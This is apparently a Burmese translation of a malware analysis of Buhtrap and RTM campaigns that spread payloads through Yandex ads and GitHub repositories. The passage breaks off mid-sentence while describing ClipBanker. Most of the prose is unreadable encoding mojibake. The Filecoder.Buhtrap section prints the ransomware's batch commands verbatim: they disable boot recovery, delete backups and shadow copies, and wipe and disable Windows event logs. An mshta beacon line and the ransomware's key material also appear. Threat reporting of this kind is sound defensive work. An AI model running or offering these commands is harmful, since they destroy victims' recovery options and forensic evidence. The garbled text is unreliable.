ááá¯ááºáá¬ááá¯ááºááá¯ááºááŸá¯áá
áºáá¯ááœáẠá
á¬áááºážááá¯ááºáá»á¬ážááᯠáá
áºááŸááºáá¬ážáááºá áááºážááá¯á·ááẠá¡áœááºááá¯ááºážááœáẠááŸá¬ááœá±ááá·áº á¡áá¯ááºá
á¬ááœááºá
á¬áááºážáá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááá¯ááºáááºá á€áááºááŸá¬ á¡ááŒááºážáá»ááºážá¡á¬ážááŒáá·áº ááœááºáá²á·ááá·áºáá¡áááºážáááºá¡ááœááºáž ááá¯ááºáá¬á¡ááœá²á·áá
áºááœá²á·ááẠáá°áááá»á¬ážáá±á¬ backdoors áá»á¬ážááᯠááŒáá·áºáá±ááŒááºážááŒá
áºáááºá
Buhtrap áá¡áááºážá¡ááŒá áºáá¯ááºááẠááááºá á¡áœááºááá¯ááºážááœááºáá±á«ááºááŒá¬ážáá²á·ááŒá®áž áááºáá°áááᯠáááºážááá¯á¡áá¯á¶ážááŒá¯ááá¯ááºáá«áááºá RTM áá¯ááºáááŸáááá¯ááºááŸá¯ááŸáá·áºáááºáááºá áá»áœááºá¯ááºááá¯á·ááœáẠá¡áá»ááºá¡áááºáááŸááá«á
á€ááá¯á·á áºááœáẠááá¯ááºááá¯ááºáá°áá»á¬ážááẠYandex.Direct ááá¯á¡áá¯á¶ážááŒá¯á áááºážááᯠGitHub ááœáẠáá¬ážááŸááá¯á¶á¡á¬áž áá»áœááºá¯ááºááá¯á· ááŒá±á¬ááŒáá«áááºá ááá¯á·á áºááẠmalware ááááºážááá¬ááá¯ááºážááá¯ááºáá¬ááœá²ááŒááºážá áááºááŒá¬ááŸá¯ááŒáá·áºáááá¯á¶ážáá»á¯ááºáááºááŒá áºáááºá
Buhtrap ááŸáá·áº RTM ááá¯á·ááẠáá¯ááºáááºážááŒááºá áá±ááŒá®ááŒá áºáááºá
ááá¹ááá¬ážááŒáá·áºááœá¬ážááŒááºáž ááŸáá·áº áá¬ážáá±á¬ááºáá»á¬áž
áá¬ážáá±á¬ááºáá»á¬ážáᶠáá±ážááá¯á·áá±á¬ áááºáá¯ááºáááºááá¯áž á¡áá»áá¯ážáá»áá¯ážááẠáá¯á¶ááŒáá·áºááœá¬ážááŸá¯ ááá¹ááá¬ážáá áºáᯠááŸááááºá ááá¯ááºááá¯ááºáá°áá»á¬áž áááºáá®ážáá¬ážááá·áº á¡áá¹ááá¬ááºááŸááá±á¬ ááá¯ááºá¡á¬ážáá¯á¶ážááᯠááá°áá®áá±á¬ GitHub ááá¯ááŸá±á¬ááºááŸá¯ááŸá áºáá¯ááœáẠáá¬ážááŸááá¬ážáá«áááºá
áá¯á¶ááŸááºá¡á¬ážááŒáá·áºá repository ááœáẠáááŒá¬ááááŒá±á¬ááºážáá²áá±áá±á¬ áá±á«ááºážáá¯ááºáá¯ááºááá¯ááºáá±á¬ á¡áá¹ááá¬ááºááŸááá±á¬ááá¯ááºáá áºáá¯áá«ááŸááááºá GitHub ááẠrepository áá áºáá¯ááá¯á·ááŒá±á¬ááºážáá²ááŸá¯áá»á¬ážááááá¯ááºážááá¯ááŒáá·áºááŸá¯áááºááá·áºá¡á¬ážááœáá·áºááŒá¯áá¬ážáá±á¬ááŒá±á¬áá·áºá á¡áá»áá¯á·áá±á¬áá¬áá¡ááœááºážáááºááá·áº malware ááŒáá·áºáá±áá²á·áááºááá¯áá»áœááºá¯ááºááá¯á·ááŒááºááá¯ááºáááºá á¡áá¹ááá¬ááºááŸááá±á¬ááá¯ááºááᯠáá±á«ááºážáá¯ááºáá¯ááºááẠáá¬ážáá±á¬ááºá¡á¬áž ááœá²áá±á¬ááºáááºá á¡áááºáá¯á¶ááœááºááŒáá¬ážááá·áº áááºááá¯áẠblanki-shabloni24[.]ru ááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá
ááá¯ááºá áá®ááá¯ááºážááŸáá·áº á¡áá¹ááá¬ááºááŸááá±á¬ ááá¯ááºáá»á¬ážá á¡áááºáá»á¬áž á¡á¬ážáá¯á¶ážááẠáá áºáá¯áááºážáá±á¬ á¡áá°á¡á ááŒá áºááẠ- áá¯á¶á á¶áá»á¬ážá ááá°áá¬áá»á¬ážá á á¬áá»á¯ááºáá»á¬ážá ááá°áá¬áá»á¬áž á áááºááá¯á·ááᯠááá¯ááºáá¬áá«áááºá Buhtrap ááŸáá·áº RTM áá±á¬á·ááºáá²ááºááᯠááááºá á á¬áááºážááá¯ááºáá»á¬ážááᯠááá¯ááºááá¯ááºáá¬ááœáẠá¡áá¯á¶ážááŒá¯áá¬ážááŒá®ážááŒá áºáááºáᯠáá°ááá«áá áááºááááºážá¡áá áºááŸá¬ áá»á°áá¬á á¡áá°áá°áá«áá²á áá áºáá¯áááºážáá±á¬áá±ážááœááºážááŸá¬ á¡ááŒááºážáááºááá¯ááºááá¯ááºáá°áá»á¬ážáááá¯ááºááá¯á· áááºááá¯á·áá±á¬ááºááŸáááœá¬ážááŒááºážáááºááŒá áºáááºá
áá±á¬áá«ááá¯áž
á¡áááºážáá¯á¶áž á€ááá¯ááºááœáẠááŒá®ážáá¯á¶ážááœá¬ážáá±á¬ ááŒá áºááá¯ááºáá»á±ááŸááá±á¬ áá¬ážáá±á¬ááºá¡áá»á¬ážá¡ááŒá¬ážááᯠá¡áá¹ááá¬ááºááŸááá±á¬ ááŒá±á¬áºááŒá¬áá»á¬ážááŒáá·áº ááœá²áá±á¬ááºáá²á·áááºá á¡á±á¬ááºááœáẠá¥ááᬠURL áá áºáá¯ááŒá áºáááºá
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ÑкаÑаÑÑ Ð±Ð»Ð°ÐœÐº ÑÑеÑа&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
ááá·áºááºá០áááºááœá±á·ááŒááºáááá·áºá¡ááá¯ááºážá ááá¬ážáááºá á¬áááºážááá¯ááºááá¯ááẠbb.f2[.]kz ááœáẠááá°ážá ááºážáááºáá¬ážáááºá ááá°áá®áá±á¬áááºááá¯ááºáá»á¬ážááœáẠáá±á«áºáá¬ááá·áºááá°ážá ááºážáá»á¬ážá á¡á¬ážáá¯á¶ážááœáẠáá°áá®áá±á¬áá²ááœááºá ááºážáá¯á¶ážáá±ážá¡áá¯ááºáá® (blanki_rsya) ááŸáá·áº á á¬áááºážááá¯áẠááá¯á·ááá¯áẠá¥ááá±áá±ážáá¬á¡áá°á¡áá®áá±ážáá±ážáááºáá±á¬ááºááŸá¯áá»á¬ážááŸáá·áº áááºáááºááá·áº á¡áá»á¬ážáá¯á¶ážááŒá áºááŒá±á¬ááºáž áááááŒá¯ááẠá¡áá±ážááŒá®ážáá«áááºá á¡áá¬ážá¡áá¬ááŸááá±á¬ áá¬ážáá±á¬ááºááẠáá áºááŸááºáá¬ážáá±á¬ ááá¯ááºááá¯ááºááŸá¯áá»á¬ážá¡ááœáẠáá»áœááºá¯ááºááá¯á·á áá°ááá»ááºááᯠáá¶á·ááá¯ážáá±ážááá·áº áá±á¬ááºážááá¯áá»áẠâáá±á«ááºážáá¯áẠááœá±áá±á¬ááºážáá¶ááœáŸá¬â ááᯠá¡áá¯á¶ážááŒá¯áá¬ážááŒá±á¬ááºáž URL á ááŒááááºá á¡á±á¬ááºááœáẠááá°ážá ááºážáá»á¬áž áá±á«áºáá¬ááá·áº ááá¯ááºáá»á¬ážááŸáá·áº áááºááá¯ááºáᬠááŸá¬ááœá±ááŸá¯ á á¯á¶á ááºážáá±ážááŒááºážááŸá¯áá»á¬áž ááŒá áºáááºá
- ááŒá±á á¬áá±á¬ááºááᯠáá±á«ááºážáá¯ááºáá¯ááºáá« - bb.f2[.]kz
- ááá°áá¬á á¬áá»á¯áẠ- Ipopen[.]ru
- áá»áŸá±á¬ááºááœáŸá¬ááá¯ááºááŒá¬ážáá»ááºááá°áᬠ- 77metrov[.]ru
- ááá±á¬áá°áá®áá»ááºáá¯á¶á ᶠ- ááá¬-dogovor-kupli-prodazhi[.]ru
- ááá°áá¬ááá¬ážáá¯á¶áž á¡ááá¬ážáá¶á ᬠ- zen.yandex[.]ru
- ááá°áá¬ááá¯ááºááŒá¬ážáá»áẠ- yurday[.]ru
- ááá°áᬠá á¬áá»á¯ááºáá¯á¶á á¶áá»á¬áž â Regforum[.]ru
- á á¬áá»á¯ááºáá¯á¶á ᶠâ assistentus[.]ru
- ááá°áá¬ááá¯ááºáááºáž ááá±á¬áá°áá®áá»áẠâ napravah[.]com
- ááá¬ážáááºá á¬áá»á¯ááºááá°áá¬áá»á¬áž - Avito[.]ru
blanki-shabloni24[.]ru site ááẠááá¯ážááŸááºážáá±á¬ á¡ááŒááºá¡á¬áá¯á¶ á¡áá²ááŒááºááŸá¯ááᯠáá»á±á¬áºááŒááºááẠááŒááºáááºáááºááŸááºáá¬ážáááºá áá¯á¶ááŸááºá¡á¬ážááŒáá·áºá GitHub ááá¯á· ááá·áºááºáá áºáá¯áá«áá±á¬ ááá±á¬áºáááºááŸááºáááºáá¯á¶á á¶ááá¯ááºáá áºáá¯ááᯠááœáŸááºááŒáá±á¬ ááŒá±á¬áºááŒá¬áá áºáá¯ááẠáááááá¬áá¬ááá¯ážááœá¬ážáá¯á¶ááá±á«áºáá«á ááá¯á·á¡ááŒááºá ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááºááááºážáá¬áá¡ááœááºáž ááŒá áºááá¯ááºáááºááŸá¬ ááá·áºáááºáá¬ááá áºáá¯á¡ááœááºáᬠááá¯ááŸá±á¬ááºáá¯á¶ááá¯á· á¡áá¹ááá¬ááºááŸááá±á¬ááá¯ááºáá»á¬ážááᯠá¡ááºáá¯ááºáá¯ááºááŒáááºá á¡áá»áááºá¡áá»á¬ážá á¯ááœááºá GitHub ááá¯ááŸá±á¬ááºááŸá¯ááœáẠááá¬áá áºááŸááºáááºáž ááá¯á·ááá¯áẠá¡ááœáẠEXE ááá¯ááºáá áºáá¯áá«ááŸááááºá ááá¯á·ááŒá±á¬áá·áºá ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááá»áá±á¬ááŸá¬ááœá±ááŸá¯áá±ážááŒááºážáá»ááºáá»á¬ážááᯠáá¯á¶á·ááŒááºááá·áºá¡áá±ááŒáá·áº á á¬áááºážááá¯ááºáá»á¬ážá០áá¬áá±á¬ááºáááºáááºááá¯ááºááŒá±á¡ááŸááá¯á¶áž áááºááá¯ááºáá»á¬ážáá±á«áºááœáẠYandex.Direct ááŸáá áºááá·áº ááŒá±á¬áºááŒá¬ááŒáá·áºáá±ááá¯ááºáááºá
áá±á¬ááºáá áºáá¯á á¡áá»áá¯ážáá»áá¯ážáá±á¬ payloads áá»á¬ážááá¯á€áááºážááŒáá·áºááŒáá·áºááŸá¯ááŒáá«á áá¯á·á
Payload Analysis
ááŒáá·áºáá»á®áá±ážááá¯ááºáᬠá¡áá»áááºááá¬áž
á¡áá¹ááá¬ááºááŸááá±á¬ áááºááááºážááẠ2018 áá¯ááŸá Ạá¡á±á¬ááºááá¯áá¬ááá¯ááºááœáẠá áááºáá²á·ááŒá®áž á á¬áá±ážáá±áá»áááºááœáẠá¡áááºáááºáá«áááºá ááá¯ááŸá±á¬ááºááŸá¯áá áºáá¯áá¯á¶ážááᯠGitHub ááœáẠáá°ááááŸááºááŒá¬ážáááá¯ááºáá±á¬ááŒá±á¬áá·áºá áá»áœááºá¯ááºááá¯á·ááẠááá°áá®áá±á¬ malware áááá¬ážá á¯ááŒá±á¬ááºáá¯á ááŒáá·áºáá±ááŸá¯ááá¯ááºáᬠáááá»áá±á¬á¡áá»áááºááá¬ážááᯠááŒá¯á á¯áá²á·ááẠ(á¡á±á¬ááºáá«áá¯á¶ááá¯ááŒáá·áºáá«)á git ááŸááºáááºážááŸáá·áº ááŸáá¯ááºážááŸááºáááºá¡ááœáẠESET áááºáá®áááºááá® ááá¯ááºážáá¬ááá·áºá¡ááá¯ááºáž ááá°ážá ááºážááá·áºááºááᯠááŸá¬ááœá±ááœá±á·ááŸáááá·áºá¡áá« ááŒáááá·áºá á¬ááŒá±á¬ááºážááᯠáá»áœááºá¯ááºááá¯á· ááá·áºááœááºážáá¬ážáá«áááºá áááºááœá±á·ááŒááºáááá·áºá¡ááá¯ááºážá áááºážááẠGitHub ááŸá payload áááŸáááá¯ááºááŸá¯ááŸáá·áº áá±á¬ááºážááœááºá áœá¬áááºá ááºáá±áááºá ááá¯ááŸá±á¬ááºááŸá¯á¡á¬áž á¡ááŒáá·áºá¡ááááá® GitHub á០áááºááŸá¬ážáá¬ážáá±á¬ááŒá±á¬áá·áº áá»áœááºá¯ááºááá¯á·ááœáẠááŒá±á¬ááºážáá²ááŸá¯ááŸááºáááºážá á¡á áááºá¡ááá¯ááºážáááŸáááá·áºá¡ááœáẠáá±áá±á¬áºáá«áá®ááá¯ááºááœáẠááœá²ááœá²ááŸá¯ááᯠááŸááºážááŒááá¯ááºáá«áááºá
áá¯á¶ 1. Malware ááŒáá·áºáá»á®ááŸá¯á á¡áá»áááºááá¬ážá
áá¯ááºáááºááŸááºááá¯ážááŒááºáž áááºááŸááºáá»á¬áž
áááºááááºážááœáẠáááºááŸááºáá»á¬ážá áœá¬ááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá á¡áá»áá¯á·ááᯠmalware áááá¬ážá á¯áá áºáá¯áááºááá¯áá±á¬ áááºááŸáẠáá±ážááá¯ážáá¬ážáá±á¬ááŒá±á¬áá·áº ááá°áá®áá±á¬ááá°áá¬áá»á¬ážááẠáá°áá®áá±á¬áááºááááºážááœááºáá«áááºááŒá±á¬ááºáž áááºáá±á¬ááºážáá±á¬áºááŒáááºá áá®ážááá·áºáá±á¬á·áááŸáááá¯ááºáá±á¬áºáááºážá á¡á±á¬áºááá±áá¬áá»á¬ážááẠbinaries áá»á¬ážááá¯á áá áºááá»áááºááŸááºáááá¯ážáá² ááá°áá¬á¡á¬ážáá¯á¶ážá¡ááœááºáá±á¬á·ááᯠá¡áá¯á¶ážáááŒá¯áá²á·áá«á 2019 áá¯ááŸá Ạáá±áá±á¬áºáá«áá®áááŸá±á¬ááºážááá¯ááºážááœááºá ááá¯ááºááá¯ááºáá°áá»á¬ážááẠáááºážááá¯á·ááœáẠááá¯ááºááá¯ááºáá±á¬á·ááá«ááá·áºá¡ááœáẠGoogle ááá¯ááºáááºááŸááºááᯠá¡áá¯á¶ážááŒá¯á ááá¬ážááááºáá±á¬ áááºááŸááºáá»á¬ážááᯠá áááºáááºáá®ážáá²á·áááºá
áááºááááºážááœááºáá«áááºááá·áº áááºááŸááºáá»á¬ážááŸáá·áº áááºážááá¯á·áááºááŸááºááá¯ážáá¬ážááá·áº áá²ááºáá²áááá¬ážá á¯áá»á¬ážá¡á¬ážáá¯á¶ážááᯠá¡á±á¬ááºáá«ááá¬ážááœáẠáá±á¬áºááŒáá¬ážáá«áááºá
á¡ááŒá¬áž malware áááá¬ážá
á¯áá»á¬ážááŸáá·áº ááá·áºááºáá»á¬ážáááºáá±á¬ááºááẠá€áá¯ááºáááºááŸááºááá¯ážáááºááŸááºáá»á¬ážááᯠáá»áœááºá¯ááºááá¯á·áááºáž á¡áá¯á¶ážááŒá¯áá¬ážáá«áááºá áááºááŸááºá¡áá»á¬ážá
á¯á¡ááœááºá GitHub repository ááŸáááá·áº ááŒáá·áºáá±ááá¬ážáá±á¬ ááá°áá¬áá»á¬ážááᯠáááœá±á·áá«á ááá¯á·áá±á¬áºá TOV âMARIYAâ áááºááŸááºááᯠbotnet ááŸáá·áºáááºááá¯ááºááá·áº malware ááᯠáááºááŸááºááá¯ážááẠá¡áá¯á¶ážááŒá¯áá²á·áááºá
Win32/Filecoder.Buhtrap
áá»áœááºá¯ááºááá¯á·áá¡á¬áá¯á¶ááá¯áááºážá á¬ážááá¯ááºáá±á¬ ááááá¯á¶ážá¡á áááºá¡ááá¯ááºážááŸá¬ á¡áá áºááœá±á·ááŸááá¬ážáá±á¬ Win32/Filecoder.Buhtrap ááŒá áºáááºá áááºážááẠáá áºáá«áá áºáá¶ááœáẠáá¯ááºááá¯ážáá¬ážáá±á¬ Delphi ááœáááá¯ááºáá áºáá¯ááŒá áºáááºá áááºážááᯠáá±áá±á¬áºáá«áá®á០áááºá 2019 ááœáẠá¡áááááŒáá·áºáá±áá²á·áááºá áááºážááẠransomware áááá¯ááááºááŸáá·áº áá»á±á¬áºáá®á áœá¬ ááŒá¯áá°ááẠ- áááºážááẠáá±áááœááºáž áááá¯ááºááºáá»á¬ážááŸáá·áº ááœááºáááºááá¯ááºááœá²áá»á¬ážááᯠááŸá¬ááœá±ááŒá®áž ááœá±á·ááŸááá¬ážáá±á¬ ááá¯ááºáá»á¬ážááᯠá á¬ááŸááºáá±ážáááºá áá¯ááºááŸááºááŒááºážáá±á¬á·áá»á¬ážáá±ážááá¯á·ááẠáá¬áá¬ááᯠááááºááœááºáá±á¬ááŒá±á¬áá·áº á¡áá±ážá¡áá°áá¯ááºááẠá¡ááºáá¬áááºáá»áááºáááºááŸá¯ áááá¯á¡ááºáá«á áááºážá¡á á¬ážá áááºážááẠááœá±ážáá¯ááºááá¯ážáááºáá±á·áá»áºáá¡áá¯á¶ážááœáẠâááá¯áááºâ ááᯠáá±á«ááºážááá·áºáᬠá¡á±á¬áºááá±áá¬áá»á¬ážááŸáá·áº áááºááœááºáááºá¡ááœáẠá¡á®ážáá±ážáẠááá¯á·ááá¯áẠBitmessage ááᯠá¡áá¯á¶ážááŒá¯ááẠá¡ááŒá¶ááŒá¯áá¬ážáááºá
ááááœááºááŸááœáẠá¡áááºážá¡ááŒá áºáá»á¬ážá áœá¬ááᯠáááºááá¯ááºááá»áŸ áá¯ááºááŸááºáááºá Filecoder.Buhtrap ááẠáá¯ááºááŸááºááŒááºážááᯠá¡ááŸá±á¬áá·áºá¡ááŸááºááŒá áºá á±ááá¯ááºááá·áº á¡ááá¯ážáááºá¡áá»ááºá¡áááºáá»á¬ážáá«ááŸááá±á¬ á¡ááœáá·áºááá¯ááºááá¯ááºááœááºáááááá¬áá»á¬ážáá«ááá·áº áá±á¬á·áá±á¬á·ááºáá²ááᯠááááºááẠáá®ááá¯ááºážáá¯ááºáá¬ážáá±á¬ áá»ááºáá»áŸááºáá áºáá¯ááᯠáá¯ááºáá±á¬ááºáááºá áá áºááŸááºáá¯ááºáááºážá ááºáá»á¬ážááẠá¡áááá¡á¬ážááŒáá·áº áá±áá¬áá±á·á áºá á®áá¶ááá·áºááœá²ááŸá¯á áá áºáá»á¬áž (DBMS) ááŒá áºáááºá ááá¯á·á¡ááŒááºá Filecoder.Buhtrap ááẠáá±áá¬ááŒááºáááºááá°áááºáááºáá²á á±ááẠááŸááºáááºážááá¯ááºáá»á¬ážááŸáá·áº á¡áááºáá»á¬ážááᯠáá»ááºáááºá áá«ááá¯áá¯ááºááá¯á·á á¡á±á¬ááºá batch script ááᯠrun ááá¯ááºáá«á
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap ááẠáááºááá¯ááºáá¬áá±á¬ááºáá°áá»á¬ážá¡ááŒá±á¬ááºáž á¡áá»ááºá¡áááºá á¯áá±á¬ááºážááẠáá®ááá¯ááºážáá¯ááºáá¬ážáá±á¬ ááá¬ážáááºá¡áœááºááá¯ááºáž IP Logger áááºáá±á¬ááºááŸá¯ááᯠá¡áá¯á¶ážááŒá¯áá«áááºá áááºážááẠcommand line ááá¬áááºááŒá áºááá·áº ransomware ááá¬ážáá±á¬ááºáá»á¬ážááá¯ááŒá±áá¬áá¶áááºáááºááœááºáááº-
mshta.exe "javascript:document.write('');"
áááºáá¯ááºááŒááºážá á¬áááºážáá¯á¶ážáá¯ááŸáá·áº áááá¯ááºáá®áá«á áá¯ááºááŸááºááŒááºážá¡ááœáẠááá¯ááºáá»á¬ážááᯠááœá±ážáá»ááºáááºááŒá áºáááºá ááááŠážá áœá¬á á¡á±á¬ááºáá« extension áá»á¬ážáá«ááŸááá±á¬ ááá¯ááºáá»á¬ážááᯠáá¯ááºááŸááºááá¬ážáá«- .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys ááŸáá·áº .bat. áá¯áááá¡áá±ááŒáá·áºá áááºážááŒá±á¬ááºážá¡ááŒáá·áºá¡á á¯á¶ááœáẠá¡á±á¬ááºáá«á á¬áááºážá០áááºážááœáŸááºá á¬ááŒá±á¬ááºážáá»á¬ážáá«ááŸááá±á¬ ááá¯ááºá¡á¬ážáá¯á¶ážááᯠáááºáá¯ááºáá¬ážáááºá
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
ááááá á¡áá»áá¯á·áá±á¬ááá¯ááºá¡áááºáá»á¬ážááá¯áááºáž áá¯ááºááŸááºááŒááºážá០áááºáá¯ááºáá¬ážááŒá®áž áááºážááá¯á·á¡áááºá០ááœá±ážáá¯ááºááá¯ážáááºáá±á·áá»áºá ááá¯ááºá¡áááºááŒá áºáááºá á á¬áááºážááᯠá¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááºá áááºááŸá¬ážáááºááŸá¬á á€ááŒáœááºážáá»ááºáá»á¬ážá¡á¬ážáá¯á¶ážááẠá ááºáááºáááºáá±á á±ááẠáááºááœááºáá±á¬áºáááºáž áááºážááŸáá·áºááá¯ááºáááºááŸá¯á¡áááºážáá¯á¶ážááŒáá·áº áá¯ááºáá±á¬ááºááŒááºážááŒá áºáááºá
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
ááá¯áẠáá¯ááºááŸááºááŒááºáž á¡á á®á¡á ááº
áá¯ááºáá±á¬ááºááŒá®ážáááºááŸáá·áºá malware ááẠ512-bit RSA áá±á¬á·ááœá²áá áºáá¯ááᯠáá¯ááºáá±ážáááºá ááá¯á·áá±á¬áẠáá®ážááá·áºáááºááááºáž (d) ááŸáá·áº modulus (n) ááᯠhard-coded 2048-bit public key (public exponent ááŸáá·áº modulus)á zlib-packed ááŸáá·áº base64 encode ááŒáá·áº áá¯ááºááŸááºáá¬ážáááºá áááºážá¡ááœáẠáá¬áááºááŸááá±á¬áá¯ááºááᯠáá¯á¶ 2 ááœáẠááŒáá¬ážáááºá
áá¯á¶ 2. 512-bit RSA áá±á¬á·ááœá²áá»áá¯ážáááºááŒá
áºá
ááºá Hex-Rays ááœá²áá¯ááºááŒááºážáááááºá
á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááºááŸá¬ ááœá±ážáá¯ááºááá¯ážáááºáá±á·áá»áºááœáẠáá°ážááœá²áá«ááŸááá±á¬ ááá¯áááºáá áºáá¯ááŒá áºááá·áº áá¯ááºáá±ážáá¬ážáá±á¬ áá®ážááá·áºáá±á¬á·ááŒáá·áº ááá¯ážááá¯ážá á¬áá¬ážá á¥ááá¬áá áºáá¯ááŒá áºáááºá
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
ááá¯ááºááá¯ááºáá°áá»á¬ážá á¡áá»á¬ážáá°ááŸá¬áá±á¬á·ááᯠá¡á±á¬ááºááœáẠáá±á¬áºááŒáá¬ážáááºá
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ááá¯ááºáá»á¬ážááᯠ128-bit áá±á¬á·ááŒáá·áº AES-256-CBC ááŒáá·áº áá¯ááºááŸááºáá¬ážáááºá áá¯ááºááŸááºáá¬ážáá±á¬ ááá¯ááºáá
áºáá¯á
á®á¡ááœááºá áá±á¬á·á¡áá
áºááŸáá·áº á¡á
ááŒá¯ááŒááºáž vector á¡áá
áºááᯠáá¯ááºáá±ážáá«áááºá áá±á¬á·á¡áá»ááºá¡áááºáá»á¬ážááᯠáá¯ááºááŸááºáá¬ážáá±á¬ááá¯ááºáá¡áá¯á¶ážááœáẠááá·áºááœááºážáá¬ážáááºá áá¯ááºááŸááºáá¬ážáá±á¬ááá¯ááºá áá±á¬áºáááºááᯠá
ááºážá
á¬ážááŒáá·áºáá¡á±á¬ááºá
áá¯ááºááŸááºáá¬ážáá±á¬ ááá¯ááºáá»á¬ážááœáẠá¡á±á¬ááºáá« áá±á«ááºážá
á®ážáá«ááŸááááº-
VEGA ááŸá±á¬áºáááºááá¯ážááᯠáá±á«ááºážááá·áºááŒááºážááŒáá·áº á¡áááºážá¡ááŒá
áºááá¯ááºáá±áá¬ááᯠááá 0x5000 bytes ááá¯á· áá¯ááºááŸááºáá¬ážáááºá áá¯ááºááŸááºááŒááºážááá¯ááºáᬠá¡áá»ááºá¡áááºá¡á¬ážáá¯á¶ážááᯠá¡á±á¬ááºáá«ááœá²á·á
ááºážáá¯á¶áá«ááŸááá±á¬ ááá¯ááºáá
áºáá¯ááá¯á· ááœá²áá¬ážáááºá
- ááá¯ááºá¡ááœááºá¡á
á¬áž á¡ááŸááºá¡áá¬ážááœáẠááá¯ááºá¡ááœááºá¡á
á¬ážááẠ0x5000 bytes ááẠááŒá®ážáá¬ážááŒááºážááŸááááŸá ááœáŸááºááŒááá·áº á¡ááŸááºá¡áá¬ážáá«ááŸááááºá
â AES áá±á¬á· blob = ZlibCompress(RSAEncrypt(AES áá±á¬á· + IVá áá¯ááºáá¯ááºááŒá®áž RSA áá±á¬á·ááœá²á á¡áá»á¬ážáá°ááŸá¬áá±á¬á·))
- RSA áá±á¬á· blob = ZlibCompress(RSAEncrypt(áá¯ááºáá±ážáá±á¬ RSA áá®ážááá·áºáá±á¬á·á hard-coded RSA á¡áá»á¬ážáá°ááŸá¬áá±á¬á·))
Win32/ClipBanker
Win32/ClipBanker ááẠ2018 áá¯ááŸá Ạá¡á±á¬ááºááá¯áá¬áááŸá±á¬ááºážááá¯ááºážá០áá®áááºáá¬áá¡á á±á¬ááá¯ááºážá¡áá áááºááá¯ááºááŒáá·áºáá±áá²á·áá±á¬ á¡á áááºá¡ááá¯ááºážáá áºáá¯ááŒá áºáááºá áááºážáá¡áááºážááá¹áááẠclipboard áá¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááá¯á á±á¬áá·áºááŒáá·áºáááºááŒá áºááŒá®ážá áááºážááẠcryptocurrency ááá¯ááºáá¶á¡áááºáá»á¬ážáááááºá á¬áá»á¬ážááá¯ááŸá¬ááœá±áááºá áá áºááŸááºááá¯ááºáá¶á¡áááºááááºá á¬ááᯠáá¯á¶ážááŒááºááŒá®ážáá±á¬ááºá ClipBanker ááẠáááºážá¡á¬áž á¡á±á¬áºááá±áá¬áá»á¬ážááá¯ááºáááºáᯠáá°ááááá·áº ááááºá á¬áá áºáá¯ááŒáá·áº á¡á á¬ážááá¯ážáááºá áá»áœááºá¯ááºááá¯á·á á áºáá±ážáá¬ážáá±á¬ááá°áá¬áá»á¬ážááẠáá¯ááºááá¯ážáá¬ážááŒááºážááá¯ááºá ááŸá¯ááºááœá±ážááŸá¯áááŸááá«á á¡ááŒá¯á¡áá°ááᯠáá¯á¶ážááœááºááẠá¡áá¯á¶ážááŒá¯ááá·áº áá 